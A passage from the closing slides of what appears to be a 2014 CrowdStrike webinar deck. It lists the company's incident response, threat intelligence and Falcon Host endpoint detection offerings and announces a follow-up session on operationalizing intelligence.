        • CrowdStrike knowledge and experience can help you improve or build plans
      – Incident Response Services Retainer
        • Avoid paperwork-related time delays
    • CrowdStrike Intelligence Subscription
      – Stay Up To Date with the Latest Attacker TTPs
  • 39. CROWDSTRIKE RESOURCES
  • 40. CrowdStrike Global Threat Report
    • Adversary activity analysis and predictions
    • Look back at 2013
    • Predictive trends for 2014
    • Threat actor profiles and TTPs
    • Get it on crowdstrike.com
  • 41. CrowdStrike Services (diagram): Proactive Response Services and Incident Response Services, alongside Technology and Intelligence
  • 42. CrowdStrike Services
    • Proactive Response Services
      – Counter Threat Assessment
      – IR Program Development
      – Next-Gen Pen Testing
      – Tabletop Assessment
      – InfoSec Capability Maturity Model
      – Adversary Assessments
    • Incident Response Services
      – Computer Forensic Analysis
      – Litigation Support
      – Expert Witness Testimony
      – Remediation
      – Malware Analysis
  • 43. Falcon Intelligence: Threat Intelligence Subscription
    1. Government-quality intelligence developed using an ‘all-source model’
    2. Detailed technical and strategic analysis of 50+ adversaries’ capabilities, indicators and tradecraft, attribution and intentions
    3. Customizable feeds and API for indicators of compromise
    4. Indicators can be integrated into current firewall, IDS/IPS, or SIEM solutions to provide real-time attribution
    5. Tailored Intelligence feature provides visibility into breaking events that matter to an organization’s brand, infrastructure, and customers
  • 44. Falcon Host: Endpoint Threat Detection & Response
    1. Identifies unknown malware & detects zero-day threats
    2. Captures and correlates system events to identify adversary activity in real time
    3. Maximum visibility across the full kill chain allows for insight into past & current attacks
    4. Context-based detection does not rely on signatures or easily changed IOCs
    5. Intelligence integration provides full attribution to identify context, motivation, and actor behind an attack
  • 45. Falcon Host: Continuous Endpoint Activity Monitoring
    1. Explore rich execution data collected by the Falcon Host sensors
    2. Dashboards provide an at-a-glance view of recent activity for investigative purposes
    3. Expert-designed menu of queries provides the ability to proactively hunt for malicious activity
  • 46. Q & A
  • 47. NEXT
    Topic: Operationalizing Intelligence
    Adam Meyers – Director, Intelligence
    Elia Zaitsev – Senior Sales Engineer
    April 29th | 2PM ET / 11AM PT
    Q&A